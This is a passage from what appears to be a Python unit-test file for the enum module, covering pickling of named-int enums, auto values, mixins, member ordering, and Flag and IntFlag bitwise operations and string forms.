def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
def __reduce_ex__(self, proto):
return self.__class__, self._args
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI' # needed for pickle protocol 4
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
test_pickle_dump_load(self.assertEqual, NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_subclasses_without_direct_pickle_support(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_exception(self.assertRaises, TypeError, NEI.x)
test_pickle_exception(self.assertRaises, PicklingError, NEI)
def test_subclasses_without_direct_pickle_support_using_name(self):
class NamedInt(int):
__qualname__ = 'NamedInt'
def __new__(cls, *args):
_args = args
name, *args = args
if len(args) == 0:
raise TypeError("name and value must be specified")
self = int.__new__(cls, *args)
self._intname = name
self._args = _args
return self
@property
def __name__(self):
return self._intname
def __repr__(self):
# repr() is updated to include the name and type info
return "{}({!r}, {})".format(type(self).__name__,
self.__name__,
int.__repr__(self))
def __str__(self):
# str() is unchanged, even if it relies on the repr() fallback
base = int
base_str = base.__str__
if base_str.__objclass__ is object:
return base.__repr__(self)
return base_str(self)
# for simplicity, we only define one operator that
# propagates expressions
def __add__(self, other):
temp = int(self) + int( other)
if isinstance(self, NamedInt) and isinstance(other, NamedInt):
return NamedInt(
'({0} + {1})'.format(self.__name__, other.__name__),
temp )
else:
return temp
class NEI(NamedInt, Enum):
__qualname__ = 'NEI'
x = ('the-x', 1)
y = ('the-y', 2)
def __reduce_ex__(self, proto):
return getattr, (self.__class__, self._name_)
self.assertIs(NEI.__new__, Enum.__new__)
self.assertEqual(repr(NEI.x + NEI.y), "NamedInt('(the-x + the-y)', 3)")
globals()['NamedInt'] = NamedInt
globals()['NEI'] = NEI
NI5 = NamedInt('test', 5)
self.assertEqual(NI5, 5)
self.assertEqual(NEI.y.value, 2)
test_pickle_dump_load(self.assertIs, NEI.y)
test_pickle_dump_load(self.assertIs, NEI)
def test_tuple_subclass(self):
class SomeTuple(tuple, Enum):
__qualname__ = 'SomeTuple' # needed for pickle protocol 4
first = (1, 'for the money')
second = (2, 'for the show')
third = (3, 'for the music')
self.assertIs(type(SomeTuple.first), SomeTuple)
self.assertIsInstance(SomeTuple.second, tuple)
self.assertEqual(SomeTuple.third, (3, 'for the music'))
globals()['SomeTuple'] = SomeTuple
test_pickle_dump_load(self.assertIs, SomeTuple.first)
def test_duplicate_values_give_unique_enum_items(self):
class AutoNumber(Enum):
first = ()
second = ()
third = ()
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
self.assertEqual(
list(AutoNumber),
[AutoNumber.first, AutoNumber.second, AutoNumber.third],
)
self.assertEqual(int(AutoNumber.second), 2)
self.assertEqual(AutoNumber.third.value, 3)
self.assertIs(AutoNumber(1), AutoNumber.first)
def test_inherited_new_from_enhanced_enum(self):
class AutoNumber(Enum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = object.__new__(cls)
obj._value_ = value
return obj
def __int__(self):
return int(self._value_)
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_inherited_new_from_mixed_enum(self):
class AutoNumber(IntEnum):
def __new__(cls):
value = len(cls.__members__) + 1
obj = int.__new__(cls, value)
obj._value_ = value
return obj
class Color(AutoNumber):
red = ()
green = ()
blue = ()
self.assertEqual(list(Color), [Color.red, Color.green, Color.blue])
self.assertEqual(list(map(int, Color)), [1, 2, 3])
def test_equality(self):
class AlwaysEqual:
def __eq__(self, other):
return True
class OrdinaryEnum(Enum):
a = 1
self.assertEqual(AlwaysEqual(), OrdinaryEnum.a)
self.assertEqual(OrdinaryEnum.a, AlwaysEqual())
def test_ordered_mixin(self):
class OrderedEnum(Enum):
def __ge__(self, other):
if self.__class__ is other.__class__:
return self._value_ >= other._value_
return NotImplemented
def __gt__(self, other):
if self.__class__ is other.__class__:
return self._value_ > other._value_
return NotImplemented
def __le__(self, other):
if self.__class__ is other.__class__:
return self._value_ <= other._value_
return NotImplemented
def __lt__(self, other):
if self.__class__ is other.__class__:
return self._value_ < other._value_
return NotImplemented
class Grade(OrderedEnum):
A = 5
B = 4
C = 3
D = 2
F = 1
self.assertGreater(Grade.A, Grade.B)
self.assertLessEqual(Grade.F, Grade.C)
self.assertLess(Grade.D, Grade.A)
self.assertGreaterEqual(Grade.B, Grade.B)
self.assertEqual(Grade.B, Grade.B)
self.assertNotEqual(Grade.C, Grade.D)
def test_extending2(self):
class Shade(Enum):
def shade(self):
print(self.name)
class Color(Shade):
red = 1
green = 2
blue = 3
with self.assertRaises(TypeError):
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
def test_extending3(self):
class Shade(Enum):
def shade(self):
return self.name
class Color(Shade):
def hex(self):
return '%s hexlified!' % self.value
class MoreColor(Color):
cyan = 4
magenta = 5
yellow = 6
self.assertEqual(MoreColor.magenta.hex(), '5 hexlified!')
def test_subclass_duplicate_name(self):
class Base(Enum):
def test(self):
pass
class Test(Base):
test = 1
self.assertIs(type(Test.test), Test)
def test_subclass_duplicate_name_dynamic(self):
from types import DynamicClassAttribute
class Base(Enum):
@DynamicClassAttribute
def test(self):
return 'dynamic'
class Test(Base):
test = 1
self.assertEqual(Test.test.test, 'dynamic')
def test_no_duplicates(self):
class UniqueEnum(Enum):
def __init__(self, *args):
cls = self.__class__
if any(self.value == e.value for e in cls):
a = self.name
e = cls(self.value).name
raise ValueError(
"aliases not allowed in UniqueEnum: %r --> %r"
% (a, e)
)
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
with self.assertRaises(ValueError):
class Color(UniqueEnum):
red = 1
green = 2
blue = 3
grene = 2
def test_init(self):
class Planet(Enum):
MERCURY = (3.303e+23, 2.4397e6)
VENUS = (4.869e+24, 6.0518e6)
EARTH = (5.976e+24, 6.37814e6)
MARS = (6.421e+23, 3.3972e6)
JUPITER = (1.9e+27, 7.1492e7)
SATURN = (5.688e+26, 6.0268e7)
URANUS = (8.686e+25, 2.5559e7)
NEPTUNE = (1.024e+26, 2.4746e7)
def __init__(self, mass, radius):
self.mass = mass # in kilograms
self.radius = radius # in meters
@property
def surface_gravity(self):
# universal gravitational constant (m3 kg-1 s-2)
G = 6.67300E-11
return G * self.mass / (self.radius * self.radius)
self.assertEqual(round(Planet.EARTH.surface_gravity, 2), 9.80)
self.assertEqual(Planet.EARTH.value, (5.976e+24, 6.37814e6))
def test_ignore(self):
class Period(timedelta, Enum):
'''
different lengths of time
'''
def __new__(cls, value, period):
obj = timedelta.__new__(cls, value)
obj._value_ = value
obj.period = period
return obj
_ignore_ = 'Period i'
Period = vars()
for i in range(13):
Period['month_%d' % i] = i*30, 'month'
for i in range(53):
Period['week_%d' % i] = i*7, 'week'
for i in range(32):
Period['day_%d' % i] = i, 'day'
OneDay = day_1
OneWeek = week_1
OneMonth = month_1
self.assertFalse(hasattr(Period, '_ignore_'))
self.assertFalse(hasattr(Period, 'Period'))
self.assertFalse(hasattr(Period, 'i'))
self.assertTrue(isinstance(Period.day_1, timedelta))
self.assertTrue(Period.month_1 is Period.day_30)
self.assertTrue(Period.week_4 is Period.day_28)
def test_nonhash_value(self):
class AutoNumberInAList(Enum):
def __new__(cls):
value = [len(cls.__members__) + 1]
obj = object.__new__(cls)
obj._value_ = value
return obj
class ColorInAList(AutoNumberInAList):
red = ()
green = ()
blue = ()
self.assertEqual(list(ColorInAList), [ColorInAList.red, ColorInAList.green, ColorInAList.blue])
for enum, value in zip(ColorInAList, range(3)):
value += 1
self.assertEqual(enum.value, [value])
self.assertIs(ColorInAList([value]), enum)
def test_conflicting_types_resolved_in_new(self):
class LabelledIntEnum(int, Enum):
def __new__(cls, *args):
value, label = args
obj = int.__new__(cls, value)
obj.label = label
obj._value_ = value
return obj
class LabelledList(LabelledIntEnum):
unprocessed = (1, "Unprocessed")
payment_complete = (2, "Payment Complete")
self.assertEqual(list(LabelledList), [LabelledList.unprocessed, LabelledList.payment_complete])
self.assertEqual(LabelledList.unprocessed, 1)
self.assertEqual(LabelledList(1), LabelledList.unprocessed)
def test_auto_number(self):
class Color(Enum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_auto_name(self):
class Color(Enum):
def _generate_next_value_(name, start, count, last):
return name
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_name_inherit(self):
class AutoNameEnum(Enum):
def _generate_next_value_(name, start, count, last):
return name
class Color(AutoNameEnum):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 'blue')
self.assertEqual(Color.green.value, 'green')
def test_auto_garbage(self):
class Color(Enum):
red = 'red'
blue = auto()
self.assertEqual(Color.blue.value, 1)
def test_auto_garbage_corrected(self):
class Color(Enum):
red = 'red'
blue = 2
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 'red')
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 3)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_missing(self):
class Color(Enum):
red = 1
green = 2
blue = 3
@classmethod
def _missing_(cls, item):
if item == 'three':
return cls.blue
elif item == 'bad return':
# trigger internal error
return 5
elif item == 'error out':
raise ZeroDivisionError
else:
# trigger not found
return None
self.assertIs(Color('three'), Color.blue)
self.assertRaises(ValueError, Color, 7)
try:
Color('bad return')
except TypeError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
try:
Color('error out')
except ZeroDivisionError as exc:
self.assertTrue(isinstance(exc.__context__, ValueError))
else:
raise Exception('Exception not raised.')
def test_multiple_mixin(self):
class MaxMixin:
@classproperty
def MAX(cls):
max = len(cls)
cls.MAX = max
return max
class StrMixin:
def __str__(self):
return self._name_.lower()
class SomeEnum(Enum):
def behavior(self):
return 'booyah'
class AnotherEnum(Enum):
def behavior(self):
return 'nuhuh!'
def social(self):
return "what's up?"
class Color(MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(MaxMixin, StrMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, MaxMixin, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 3)
self.assertEqual(Color.MAX, 3)
self.assertEqual(str(Color.BLUE), 'blue')
class CoolColor(StrMixin, SomeEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolColor.RED.value, 1)
self.assertEqual(CoolColor.GREEN.value, 2)
self.assertEqual(CoolColor.BLUE.value, 3)
self.assertEqual(str(CoolColor.BLUE), 'blue')
self.assertEqual(CoolColor.RED.behavior(), 'booyah')
class CoolerColor(StrMixin, AnotherEnum, Enum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolerColor.RED.value, 1)
self.assertEqual(CoolerColor.GREEN.value, 2)
self.assertEqual(CoolerColor.BLUE.value, 3)
self.assertEqual(str(CoolerColor.BLUE), 'blue')
self.assertEqual(CoolerColor.RED.behavior(), 'nuhuh!')
self.assertEqual(CoolerColor.RED.social(), "what's up?")
class CoolestColor(StrMixin, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(CoolestColor.RED.value, 1)
self.assertEqual(CoolestColor.GREEN.value, 2)
self.assertEqual(CoolestColor.BLUE.value, 3)
self.assertEqual(str(CoolestColor.BLUE), 'blue')
self.assertEqual(CoolestColor.RED.behavior(), 'booyah')
self.assertEqual(CoolestColor.RED.social(), "what's up?")
class ConfusedColor(StrMixin, AnotherEnum, SomeEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ConfusedColor.RED.value, 1)
self.assertEqual(ConfusedColor.GREEN.value, 2)
self.assertEqual(ConfusedColor.BLUE.value, 3)
self.assertEqual(str(ConfusedColor.BLUE), 'blue')
self.assertEqual(ConfusedColor.RED.behavior(), 'nuhuh!')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
class ReformedColor(StrMixin, IntEnum, SomeEnum, AnotherEnum):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(ReformedColor.RED.value, 1)
self.assertEqual(ReformedColor.GREEN.value, 2)
self.assertEqual(ReformedColor.BLUE.value, 3)
self.assertEqual(str(ReformedColor.BLUE), 'blue')
self.assertEqual(ReformedColor.RED.behavior(), 'booyah')
self.assertEqual(ConfusedColor.RED.social(), "what's up?")
self.assertTrue(issubclass(ReformedColor, int))
class TestOrder(unittest.TestCase):
def test_same_members(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
def test_same_members_with_aliases(self):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
verde = green
def test_same_members_wrong_order(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
blue = 3
green = 2
def test_order_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
def test_order_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue purple'
red = 1
green = 2
blue = 3
verde = green
def test_enum_has_extra_members(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
def test_enum_has_extra_members_with_aliases(self):
with self.assertRaisesRegex(TypeError, 'member order does not match _order_'):
class Color(Enum):
_order_ = 'red green blue'
red = 1
green = 2
blue = 3
purple = 4
verde = green
class TestFlag(unittest.TestCase):
"""Tests of the Flags."""
class Perm(Flag):
R, W, X = 4, 2, 1
class Open(Flag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(Flag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm(0)), 'Perm.0')
self.assertEqual(str(~Perm.R), 'Perm.W|X')
self.assertEqual(str(~Perm.W), 'Perm.R|X')
self.assertEqual(str(~Perm.X), 'Perm.R|W')
self.assertEqual(str(~(Perm.R | Perm.W)), 'Perm.X')
self.assertEqual(str(~(Perm.R | Perm.W | Perm.X)), 'Perm.0')
self.assertEqual(str(Perm(~0)), 'Perm.R|W|X')
Open = self.Open
self.assertEqual(str(Open.RO), 'Open.RO')
self.assertEqual(str(Open.WO), 'Open.WO')
self.assertEqual(str(Open.AC), 'Open.AC')
self.assertEqual(str(Open.RO | Open.CE), 'Open.CE')
self.assertEqual(str(Open.WO | Open.CE), 'Open.CE|WO')
self.assertEqual(str(~Open.RO), 'Open.CE|AC|RW|WO')
self.assertEqual(str(~Open.WO), 'Open.CE|RW')
self.assertEqual(str(~Open.AC), 'Open.CE')
self.assertEqual(str(~(Open.RO | Open.CE)), 'Open.AC')
self.assertEqual(str(~(Open.WO | Open.CE)), 'Open.RW')
def test_repr(self):
Perm = self.Perm
self.assertEqual(repr(Perm.R), '<Perm.R: 4>')
self.assertEqual(repr(Perm.W), '<Perm.W: 2>')
self.assertEqual(repr(Perm.X), '<Perm.X: 1>')
self.assertEqual(repr(Perm.R | Perm.W), '<Perm.R|W: 6>')
self.assertEqual(repr(Perm.R | Perm.W | Perm.X), '<Perm.R|W|X: 7>')
self.assertEqual(repr(Perm(0)), '<Perm.0: 0>')
self.assertEqual(repr(~Perm.R), '<Perm.W|X: 3>')
self.assertEqual(repr(~Perm.W), '<Perm.R|X: 5>')
self.assertEqual(repr(~Perm.X), '<Perm.R|W: 6>')
self.assertEqual(repr(~(Perm.R | Perm.W)), '<Perm.X: 1>')
self.assertEqual(repr(~(Perm.R | Perm.W | Perm.X)), '<Perm.0: 0>')
self.assertEqual(repr(Perm(~0)), '<Perm.R|W|X: 7>')
Open = self.Open
self.assertEqual(repr(Open.RO), '<Open.RO: 0>')
self.assertEqual(repr(Open.WO), '<Open.WO: 1>')
self.assertEqual(repr(Open.AC), '<Open.AC: 3>')
self.assertEqual(repr(Open.RO | Open.CE), '<Open.CE: 524288>')
self.assertEqual(repr(Open.WO | Open.CE), '<Open.CE|WO: 524289>')
self.assertEqual(repr(~Open.RO), '<Open.CE|AC|RW|WO: 524291>')
self.assertEqual(repr(~Open.WO), '<Open.CE|RW: 524290>')
self.assertEqual(repr(~Open.AC), '<Open.CE: 524288>')
self.assertEqual(repr(~(Open.RO | Open.CE)), '<Open.AC: 3>')
self.assertEqual(repr(~(Open.WO | Open.CE)), '<Open.RW: 2>')
def test_or(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i | j), Perm(i.value | j.value))
self.assertEqual((i | j).value, i.value | j.value)
self.assertIs(type(i | j), Perm)
for i in Perm:
self.assertIs(i | i, i)
Open = self.Open
self.assertIs(Open.RO | Open.CE, Open.CE)
def test_and(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
for j in values:
self.assertEqual((i & j).value, i.value & j.value)
self.assertIs(type(i & j), Perm)
for i in Perm:
self.assertIs(i & i, i)
self.assertIs(i & RWX, i)
self.assertIs(RWX & i, i)
Open = self.Open
self.assertIs(Open.RO & Open.CE, Open.RO)
def test_xor(self):
Perm = self.Perm
for i in Perm:
for j in Perm:
self.assertEqual((i ^ j).value, i.value ^ j.value)
self.assertIs(type(i ^ j), Perm)
for i in Perm:
self.assertIs(i ^ Perm(0), i)
self.assertIs(Perm(0) ^ i, i)
Open = self.Open
self.assertIs(Open.RO ^ Open.CE, Open.CE)
self.assertIs(Open.CE ^ Open.CE, Open.RO)
def test_invert(self):
Perm = self.Perm
RW = Perm.R | Perm.W
RX = Perm.R | Perm.X
WX = Perm.W | Perm.X
RWX = Perm.R | Perm.W | Perm.X
values = list(Perm) + [RW, RX, WX, RWX, Perm(0)]
for i in values:
self.assertIs(type(~i), Perm)
self.assertEqual(~~i, i)
for i in Perm:
self.assertIs(~~i, i)
Open = self.Open
self.assertIs(Open.WO & ~Open.WO, Open.RO)
self.assertIs((Open.WO|Open.CE) & ~Open.WO, Open.CE)
def test_bool(self):
Perm = self.Perm
for f in Perm:
self.assertTrue(f)
Open = self.Open
for f in Open:
self.assertEqual(bool(f.value), bool(f))
def test_programatic_function_string(self):
Perm = Flag('Perm', 'R W X')
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_with_start(self):
Perm = Flag('Perm', 'R W X', start=8)
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 8<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_string_list(self):
Perm = Flag('Perm', ['R', 'W', 'X'])
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<i
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_iterable(self):
Perm = Flag('Perm', (('R', 2), ('W', 8), ('X', 32)))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_programatic_function_from_dict(self):
Perm = Flag('Perm', OrderedDict((('R', 2), ('W', 8), ('X', 32))))
lst = list(Perm)
self.assertEqual(len(lst), len(Perm))
self.assertEqual(len(Perm), 3, Perm)
self.assertEqual(lst, [Perm.R, Perm.W, Perm.X])
for i, n in enumerate('R W X'.split()):
v = 1<<(2*i+1)
e = Perm(v)
self.assertEqual(e.value, v)
self.assertEqual(type(e.value), int)
self.assertEqual(e.name, n)
self.assertIn(e, Perm)
self.assertIs(type(e), Perm)
def test_pickle(self):
if isinstance(FlagStooges, Exception):
raise FlagStooges
test_pickle_dump_load(self.assertIs, FlagStooges.CURLY|FlagStooges.MOE)
test_pickle_dump_load(self.assertIs, FlagStooges)
def test_contains(self):
Open = self.Open
Color = self.Color
self.assertFalse(Color.BLACK in Open)
self.assertFalse(Open.RO in Color)
with self.assertRaises(TypeError):
'BLACK' in Color
with self.assertRaises(TypeError):
'RO' in Open
with self.assertRaises(TypeError):
1 in Color
with self.assertRaises(TypeError):
1 in Open
def test_member_contains(self):
Perm = self.Perm
R, W, X = Perm
RW = R | W
RX = R | X
WX = W | X
RWX = R | W | X
self.assertTrue(R in RW)
self.assertTrue(R in RX)
self.assertTrue(R in RWX)
self.assertTrue(W in RW)
self.assertTrue(W in WX)
self.assertTrue(W in RWX)
self.assertTrue(X in RX)
self.assertTrue(X in WX)
self.assertTrue(X in RWX)
self.assertFalse(R in WX)
self.assertFalse(W in RX)
self.assertFalse(X in RW)
def test_auto_number(self):
class Color(Flag):
red = auto()
blue = auto()
green = auto()
self.assertEqual(list(Color), [Color.red, Color.blue, Color.green])
self.assertEqual(Color.red.value, 1)
self.assertEqual(Color.blue.value, 2)
self.assertEqual(Color.green.value, 4)
def test_auto_number_garbage(self):
with self.assertRaisesRegex(TypeError, 'Invalid Flag value: .not an int.'):
class Color(Flag):
red = 'not an int'
blue = auto()
def test_cascading_failure(self):
class Bizarre(Flag):
c = 3
d = 4
f = 6
# Bizarre.c | Bizarre.d
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "5 is not a valid Bizarre", Bizarre, 5)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "2 is not a valid Bizarre", Bizarre, 2)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
self.assertRaisesRegex(ValueError, "1 is not a valid Bizarre", Bizarre, 1)
def test_duplicate_auto(self):
class Dupes(Enum):
first = primero = auto()
second = auto()
third = auto()
self.assertEqual([Dupes.first, Dupes.second, Dupes.third], list(Dupes))
def test_bizarre(self):
class Bizarre(Flag):
b = 3
c = 4
d = 6
self.assertEqual(repr(Bizarre(7)), '<Bizarre.d|c|b: 7>')
def test_multiple_mixin(self):
class AllMixin:
@classproperty
def ALL(cls):
members = list(cls)
all_value = None
if members:
all_value = members[0]
for member in members[1:]:
all_value |= member
cls.ALL = all_value
return all_value
class StrMixin:
def __str__(self):
return self._name_.lower()
class Color(AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'Color.BLUE')
class Color(AllMixin, StrMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
class Color(StrMixin, AllMixin, Flag):
RED = auto()
GREEN = auto()
BLUE = auto()
self.assertEqual(Color.RED.value, 1)
self.assertEqual(Color.GREEN.value, 2)
self.assertEqual(Color.BLUE.value, 4)
self.assertEqual(Color.ALL.value, 7)
self.assertEqual(str(Color.BLUE), 'blue')
@support.reap_threads
def test_unique_composite(self):
# override __eq__ to be identity only
class TestFlag(Flag):
one = auto()
two = auto()
three = auto()
four = auto()
five = auto()
six = auto()
seven = auto()
eight = auto()
def __eq__(self, other):
return self is other
def __hash__(self):
return hash(self._value_)
# have multiple threads competing to complete the composite members
seen = set()
failed = False
def cycle_enum():
nonlocal failed
try:
for i in range(256):
seen.add(TestFlag(i))
except Exception:
failed = True
threads = [
threading.Thread(target=cycle_enum)
for _ in range(8)
]
with support.start_threads(threads):
pass
# check that only 248 members were created
self.assertFalse(
failed,
'at least one thread failed while creating composite members')
self.assertEqual(256, len(seen), 'too many composite members created')
class TestIntFlag(unittest.TestCase):
"""Tests of the IntFlags."""
class Perm(IntFlag):
X = 1 << 0
W = 1 << 1
R = 1 << 2
class Open(IntFlag):
RO = 0
WO = 1
RW = 2
AC = 3
CE = 1<<19
class Color(IntFlag):
BLACK = 0
RED = 1
GREEN = 2
BLUE = 4
PURPLE = RED|BLUE
def test_type(self):
Perm = self.Perm
Open = self.Open
for f in Perm:
self.assertTrue(isinstance(f, Perm))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Perm.W | Perm.X, Perm))
self.assertEqual(Perm.W | Perm.X, 3)
for f in Open:
self.assertTrue(isinstance(f, Open))
self.assertEqual(f, f.value)
self.assertTrue(isinstance(Open.WO | Open.RW, Open))
self.assertEqual(Open.WO | Open.RW, 3)
def test_str(self):
Perm = self.Perm
self.assertEqual(str(Perm.R), 'Perm.R')
self.assertEqual(str(Perm.W), 'Perm.W')
self.assertEqual(str(Perm.X), 'Perm.X')
self.assertEqual(str(Perm.R | Perm.W), 'Perm.R|W')
self.assertEqual(str(Perm.R | Perm.W | Perm.X), 'Perm.R|W|X')
self.assertEqual(str(Perm.R | 8), 'Perm.8|R')
